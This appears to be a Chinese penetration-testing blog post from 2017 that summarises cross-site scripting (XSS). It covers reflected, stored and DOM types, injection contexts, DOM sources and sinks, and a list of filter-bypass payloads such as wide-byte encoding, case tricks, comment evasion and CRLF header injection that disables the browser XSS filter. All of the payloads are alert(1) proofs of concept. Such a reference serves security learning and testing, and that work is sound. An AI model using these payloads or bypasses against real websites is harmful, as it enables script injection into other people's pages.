<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="security,xss," />





  <link rel="alternate" href="/atom.xml" title="Myths" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/logo.jpg?v=5.1.1" />






<meta name="description" content="分类：反射型payload 在 url 之中，后台未进行有效处理将 payload 输出导致 js 代码执行。js 代码可能出现的位置：

标签之间：

1234567891011121314151617- 标签之间可以直接执行的：&amp;lt;div&amp;gt;[xss]&amp;lt;/div&amp;gt;payload: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;- 有些标签之间不能">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS总结">
<meta property="og:url" content="http://myt0.com/2017/08/14/xss总结/index.html">
<meta property="og:site_name" content="Myths">
<meta property="og:description" content="分类：反射型payload 在 url 之中，后台未进行有效处理将 payload 输出导致 js 代码执行。js 代码可能出现的位置：

标签之间：

1234567891011121314151617- 标签之间可以直接执行的：&amp;lt;div&amp;gt;[xss]&amp;lt;/div&amp;gt;payload: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;- 有些标签之间不能">
<meta property="og:updated_time" content="2020-02-22T15:52:32.188Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS总结">
<meta name="twitter:description" content="分类：反射型payload 在 url 之中，后台未进行有效处理将 payload 输出导致 js 代码执行。js 代码可能出现的位置：

标签之间：

1234567891011121314151617- 标签之间可以直接执行的：&amp;lt;div&amp;gt;[xss]&amp;lt;/div&amp;gt;payload: &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;- 有些标签之间不能">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://myt0.com/2017/08/14/xss总结/"/>





  <title>XSS总结 | Myths</title>
  














</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Myths</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Myt0's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://myt0.com/2017/08/14/xss总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Myths">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/logo.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Myths">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-08-14T21:45:37+08:00">
                2017-08-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pentest/" itemprop="url" rel="index">
                    <span itemprop="name">pentest</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="分类："><a href="#分类：" class="headerlink" title="分类："></a>分类：</h2><h3 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a>反射型</h3><p>payload 在 url 之中，后台未进行有效处理将 payload 输出导致 js 代码执行。<br>js 代码可能出现的位置：</p>
<ol>
<li>标签之间：</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">- 标签之间可以直接执行的：</span><br><span class="line"><span class="tag">&lt;<span class="name">div</span>&gt;</span>[xss]<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">payload: <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined">alert(1)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">- 有些标签之间不能执行，需要先闭合：</span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span><span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">textarea</span>&gt;</span><span class="tag">&lt;/<span class="name">textarea</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">xmp</span>&gt;</span><span class="tag">&lt;/<span class="name">xmp</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">iframe</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">noscript</span>&gt;</span><span class="tag">&lt;/<span class="name">noscript</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">noframes</span>&gt;</span><span class="tag">&lt;/<span class="name">noframes</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">plaintext</span>&gt;</span><span class="tag">&lt;/<span class="name">plaintext</span>&gt;</span></span><br><span class="line">- 出现在<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>之间：</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">a=<span class="string">"[xss]"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">payload:</span><br><span class="line">";alert(1)</span><br><span class="line">"<span class="tag">&lt;/<span class="name">script</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>alert(1)</span><br></pre></td></tr></table></figure>
<ol>
<li>标签之内</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">- 文本属性：</span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">value</span>=<span class="string">"[xss]"</span> /&gt;</span></span><br><span class="line">payload: " onmouseover=alert(1) "/&gt;</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span><br><span class="line">  alert(1)</span><br><span class="line"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">- src/href/action/,img的（dynsrc/lowsrc）等属性： payload: javascript:alert(1)</span><br><span class="line">data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== (IE不支持) -</span><br><span class="line">on*事件： payload:alert(1) -</span><br><span class="line">style属性内及css代码之中IE可执行，并且在IE9以上被防御，不适合其他浏览器：</span><br><span class="line">style="width:expression(js代码)" background-image:url('javascript:alert(2)')</span><br></pre></td></tr></table></figure>
<h3 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h3><p>经过处理请求，将 XSS 代码存储到数据库，然后输出到页面。这样导致 xss 攻击持久存在。通常通过表单提交，有一些服务也通过 url 提交，甚至有些存在于其他的 HTTP 头字段之中。<br>通常这种 xss 存在于个人信息，留言，文章日志等一些功能之中。<br>至于最终 js 代码存在的位置，我们依然可以根据上面判断。</p>
<h3 id="DOM-XSS"><a href="#DOM-XSS" class="headerlink" title="DOM XSS"></a>DOM XSS</h3><p>这种 xss 是由于前端代码直接将 url 中的代码输出到页面导致。不与后台进行交互。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">例如页面存在：</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"></span><br><span class="line">  <span class="built_in">eval</span>(location.hash.substr(<span class="number">1</span>))</span><br><span class="line"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">payload: http://hostname/path#alert(1)</span><br></pre></td></tr></table></figure>
<p>常见的输入点：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">document</span>.URL</span><br><span class="line"><span class="built_in">document</span>.URLUnencoded</span><br><span class="line"><span class="built_in">document</span>.location</span><br><span class="line"><span class="built_in">document</span>.referrer</span><br><span class="line"><span class="built_in">window</span>.location</span><br><span class="line"><span class="built_in">window</span>.name</span><br><span class="line"><span class="built_in">document</span>.cookie</span><br></pre></td></tr></table></figure>
<p>常见输出点：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">输出HTML：</span><br><span class="line"><span class="built_in">document</span>.write(x)</span><br><span class="line"><span class="built_in">document</span>.writeln(x)</span><br><span class="line"><span class="built_in">document</span>.body.innerHTML = x</span><br><span class="line"></span><br><span class="line">修改DOM树属性：</span><br><span class="line"><span class="built_in">document</span>.forms[<span class="number">0</span>].action = x (另外还有一些对象的src/href)</span><br><span class="line"><span class="built_in">document</span>.attachEvent(x)</span><br><span class="line"><span class="built_in">document</span>.create...(x)</span><br><span class="line"><span class="built_in">document</span>.execCommand(x)</span><br><span class="line"><span class="built_in">document</span>.body.x</span><br><span class="line"><span class="built_in">window</span>.attachEvent(x)</span><br><span class="line"></span><br><span class="line">修改URL：</span><br><span class="line"><span class="built_in">document</span>.location = x</span><br><span class="line"><span class="built_in">document</span>.location.hostname = x</span><br><span class="line"><span class="built_in">document</span>.location.replace(x)</span><br><span class="line"><span class="built_in">document</span>.location.assign(x)</span><br><span class="line"><span class="built_in">document</span>.URL = x</span><br><span class="line"><span class="built_in">window</span>.navigate(x)</span><br><span class="line"></span><br><span class="line">打开新窗口：</span><br><span class="line"><span class="built_in">document</span>.open(x)</span><br><span class="line"><span class="built_in">window</span>.open(x)</span><br><span class="line"><span class="built_in">window</span>.location.href = x</span><br><span class="line"></span><br><span class="line">直接执行的：</span><br><span class="line"><span class="built_in">eval</span>(x)</span><br><span class="line"><span class="built_in">window</span>.execScript(x)</span><br><span class="line"><span class="built_in">window</span>.setInterval(x)</span><br><span class="line"><span class="built_in">window</span>.setTimeout(x)</span><br></pre></td></tr></table></figure>
<h2 id="绕过方式"><a href="#绕过方式" class="headerlink" title="绕过方式"></a>绕过方式</h2><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">宽字节编码，同时开启magic_quotes_gpc=On，可通过以下payload绕过</span><br><span class="line">1.php?x=1%81";alert(1) //当charset=GBK/GB2312等编码</span><br><span class="line">magic_quotes_gpc=On:</span><br><span class="line">1.php?x=<span class="tag">&lt;<span class="name">script</span> %<span class="attr">00</span>%<span class="attr">00</span>%<span class="attr">00</span>&gt;</span><span class="undefined">alert(1)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">空格绕过</span><br><span class="line"><span class="tag">&lt;<span class="name">img</span>/<span class="attr">src</span>=<span class="string">""</span><span class="attr">onerror</span>=<span class="string">alert(2)</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">svg</span>/<span class="attr">onload</span>=<span class="string">alert(2)</span>&gt;</span><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span><br><span class="line"></span><br><span class="line">大小写</span><br><span class="line"><span class="tag">&lt;<span class="name">SCript</span>&gt;</span><span class="undefined">alert(2)</span><span class="tag">&lt;/<span class="name">SCript</span>&gt;</span></span><br><span class="line"></span><br><span class="line">响应头CRLF关闭浏览器XSS Filter,</span><br><span class="line">头部注入X-XSS-Protection:0</span><br><span class="line">这种情况用于请求的URL链接在相应回来urldecode后导致换行，换行部分形成响应头：</span><br><span class="line">比如：</span><br><span class="line">http://x.com/xx.action?id=%0d%0aContent-Type:%20text/html%0d%0aX-XSS-Protection:%200%0d%0a%0d%0ax%3Cscript%3Ealert(1);%3C/script%3Ey</span><br><span class="line">经过urldecode后为：</span><br><span class="line">http://x.com/xx.action?id=</span><br><span class="line">Content-Type: text/html</span><br><span class="line">X-XSS-Protection: 0</span><br><span class="line"></span><br><span class="line">x<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined">alert(1);</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>y</span><br><span class="line"></span><br><span class="line">有些过滤器不检测注释，可用以下代码绕过：</span><br><span class="line"><span class="comment">&lt;!--&lt;a href="--&gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">x</span> <span class="attr">onerror</span>=<span class="string">alert(2)//</span>"&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"></span><br><span class="line">eval(String.fromCharCode())</span><br><span class="line"></span><br><span class="line">绕过URL过滤：</span><br><span class="line">URL编码</span><br><span class="line">十进制 http://</span><br><span class="line">十六进制 http://0x01.0x01.0x01.0x01</span><br><span class="line">八进制 http://01.01.01.01</span><br><span class="line">```</span><br></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      Myths
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://myt0.com/2017/08/14/xss总结/" title="XSS总结">http://myt0.com/2017/08/14/xss总结/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="external nofollow" target="_blank">CC BY-NC-ND 4.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/security/" rel="tag"># security</a>
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/08/10/sql-server-sqli/" rel="next" title="MSSQL注入总结">
                <i class="fa fa-chevron-left"></i> MSSQL注入总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/07/information-gathering/" rel="prev" title="信息搜集">
                信息搜集 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yOTQxMi81OTgw"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/logo.jpg"
               alt="Myths" />
          <p class="site-author-name" itemprop="name">Myths</p>
           
              <p class="site-description motion-element" itemprop="description">Funny world, lonely world</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">21</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#分类："><span class="nav-number">1.</span> <span class="nav-text">分类：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#反射型"><span class="nav-number">1.1.</span> <span class="nav-text">反射型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#存储型"><span class="nav-number">1.2.</span> <span class="nav-text">存储型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#DOM-XSS"><span class="nav-number">1.3.</span> <span class="nav-text">DOM XSS</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过方式"><span class="nav-number">2.</span> <span class="nav-text">绕过方式</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Myths</span>
</div>


<!--<div class="powered-by">
  Copyright © 2017 Myths
</div>-->

<!--<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>-->


        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>


        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



    
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  


  





  

  

  

  

  

  

</body>
</html>
